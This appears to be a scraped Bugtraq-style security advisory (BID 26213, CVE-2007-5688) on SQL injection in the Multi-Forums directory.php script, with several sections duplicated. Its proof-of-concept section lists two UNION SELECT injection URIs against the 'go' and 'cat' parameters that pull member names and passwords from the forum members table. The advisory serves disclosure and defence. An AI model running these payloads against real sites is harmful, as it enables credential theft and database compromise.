Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities
BID:26213
Info
Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26213 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5688 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 25 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | KiNgOfThEwOrLd is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Multi-Forums Multi-Forums 0 |
| Not Vulnerable: | |
Discussion
Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities
Multi-Forums is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Multi-Forums is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]
http://www.example.com/directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]
http://www.example.com/directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]
Solution / Fix
Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities
References:
References: